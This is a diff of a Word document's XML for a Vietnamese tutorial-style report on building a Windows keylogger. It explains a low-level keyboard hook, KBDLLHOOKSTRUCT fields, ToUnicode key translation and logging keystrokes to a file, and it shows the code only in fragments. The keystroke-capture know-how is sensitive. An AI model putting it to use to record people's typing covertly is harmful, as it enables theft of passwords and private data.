+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -11176,7 +14315,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve"> fopen</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>fopen</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -11187,6 +14336,7 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -11280,6 +14430,7 @@
         </w:rPr>
         <w:t xml:space="preserve">        </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -11298,7 +14449,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>((</w:t>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="666600"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -11466,6 +14627,15 @@
           <w:szCs w:val="20"/>
         </w:rPr>
         <w:tab/>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
         <w:t>fprintf</w:t>
       </w:r>
       <w:r>
@@ -11477,6 +14647,7 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -11555,6 +14726,7 @@
         </w:rPr>
         <w:tab/>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -11575,6 +14747,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -11664,7 +14837,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">                fprintf</w:t>
+        <w:t xml:space="preserve">                </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>fprintf</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -11675,6 +14858,7 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -11753,6 +14937,7 @@
         </w:rPr>
         <w:tab/>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -11773,6 +14958,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -11824,7 +15010,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">        fclose</w:t>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>fclose</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -11835,6 +15031,7 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -11944,6 +15141,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -11964,6 +15162,7 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -12210,7 +15409,25 @@
           <w:bCs/>
         </w:rPr>
         <w:tab/>
-        <w:t>LRESULT CALLBACK HookProc(int nCode, WPARAM wParam, LPARAM lParam)</w:t>
+        <w:t xml:space="preserve">LRESULT CALLBACK </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>HookProc(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>int nCode, WPARAM wParam, LPARAM lParam)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12255,31 +15472,67 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>– nCode: giá trị giúp xác định cách xử lý thông điệp. Nếu nCode nhỏ hơn 0, hook procedure sẽ gọi CallNextHookEx</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>()</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>. Ngược lại sẽ thực hiện các công việc xử lý trước khi gọi CallNextHookEx</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>()</w:t>
+        <w:t xml:space="preserve">– nCode: giá trị giúp xác định cách xử lý thông điệp. Nếu nCode nhỏ hơn 0, hook procedure sẽ gọi </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>CallNextHookEx</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Ngược lại sẽ thực hiện các công việc xử lý trước khi gọi </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>CallNextHookEx</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12330,8 +15583,18 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> hook bàn phím thì wParam sẽ có giá trị của phím được nhấn, lParam sẽ chứa các thông tin về số lần nhấn, các phím tắt, trạng thái phím,…</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> hook bàn phím thì wParam sẽ có giá trị của phím được nhấn, lParam sẽ chứa các thông tin về số lần nhấn, các phím tắt, trạng thái </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>phím,…</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -12358,7 +15621,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>xong các thủ tục sau đó rồi mới gọi hàm CallNextHookEx().</w:t>
+        <w:t xml:space="preserve">xong các thủ tục sau đó rồi mới gọi hàm </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>CallNextHookEx(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12724,7 +16005,18 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">  DWORD     vkCode</w:t>
+        <w:t xml:space="preserve">  DWORD     </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pln"/>
+          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>vkCode</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -12736,6 +16028,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -12776,7 +16069,18 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">  DWORD     scanCode</w:t>
+        <w:t xml:space="preserve">  DWORD     </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pln"/>
+          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>scanCode</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -12788,6 +16092,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -12828,7 +16133,18 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">  DWORD     flags</w:t>
+        <w:t xml:space="preserve">  DWORD     </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pln"/>
+          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>flags</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -12840,6 +16156,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -12880,7 +16197,18 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">  DWORD     time</w:t>
+        <w:t xml:space="preserve">  DWORD     </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pln"/>
+          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>time</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -12892,6 +16220,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -12932,7 +16261,18 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">  ULONG_PTR dwExtraInfo</w:t>
+        <w:t xml:space="preserve">  ULONG_PTR </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pln"/>
+          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>dwExtraInfo</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -12944,6 +16284,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -13142,8 +16483,27 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">hệ thống như TAB, CTRL, SHIFT,... ta sẽ in ra chúng ngay lập tức. Đối với các phím chữ cái và số bình thường, ta sử dụng hàm </w:t>
-      </w:r>
+        <w:t xml:space="preserve">hệ thống như TAB, CTRL, </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>SHIFT,...</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ta sẽ in ra chúng ngay lập tức. Đối với các phím chữ cái và số bình thường, ta sử dụng hàm </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -13158,7 +16518,16 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>()</w:t>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13206,7 +16575,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">Mảng 256 byte nhận dữ liệu trạng thái cho mỗi </w:t>
+        <w:t xml:space="preserve">Mảng </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>256 byte</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> nhận dữ liệu trạng thái cho mỗi </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13259,6 +16646,7 @@
         </w:rPr>
         <w:t xml:space="preserve">Hàm </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -13267,7 +16655,18 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>ToUnicode(kbdllStruct.vkCode, kbdllStruct.scanCode, (PBYTE)&amp;keyState, (LPWSTR)&amp;buffer, sizeof(buffer)/2, 0);</w:t>
+        <w:t>ToUnicode(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>kbdllStruct.vkCode, kbdllStruct.scanCode, (PBYTE)&amp;keyState, (LPWSTR)&amp;buffer, sizeof(buffer)/2, 0);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13314,7 +16713,42 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>kbdllStruct.vkCode</w:t>
+        <w:t xml:space="preserve">kbdllStruct.vkCode: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Mã ảo của phím sẽ được dịch.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">- </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>kbdllStruct.scanCode</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13330,7 +16764,15 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Mã ảo của phím sẽ được dịch.</w:t>
+        <w:t>Mã quét phần cứng của khóa cần dịch</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13357,7 +16799,34 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>kbdllStruct.scanCode</w:t>
+        <w:t>(PBYTE)&amp;keyState</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">- </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>(LPWSTR)&amp;buffer</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13373,7 +16842,66 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Mã quét phần cứng của khóa cần dịch</w:t>
+        <w:t>Bộ đệm nhận ký tự hoặc các ký tự Unicode đã dịch. Tuy nhiên, vùng đệm này có thể được trả về mà không bị kết thúc bằng null ngay cả khi tên biến gợi ý rằng nó được kết thúc bằng null</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">- </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>sizeof(buffer)/2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Kích thước, tính bằng ký tự, của vùng đệm được trỏ tới bởi tham số</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>(LPWSTR)&amp;buffer</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13400,15 +16928,15 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">- </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>(PBYTE)&amp;keyState</w:t>
+        <w:t xml:space="preserve">- Giá trị cờ cuối cùng: cờ điều khiển hàm. Đặt giá trị là 0 sẽ </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ghi nhận phím đó vào buffer.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13427,31 +16955,15 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">- </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>(LPWSTR)&amp;buffer</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Bộ đệm nhận ký tự hoặc các ký tự Unicode đã dịch. Tuy nhiên, vùng đệm này có thể được trả về mà không bị kết thúc bằng null ngay cả khi tên biến gợi ý rằng nó được kết thúc bằng null</w:t>
+        <w:t>Cuối cùng là hàm để ghi giá trị vào file log</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13470,127 +16982,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">- </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>sizeof(buffer)/2</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
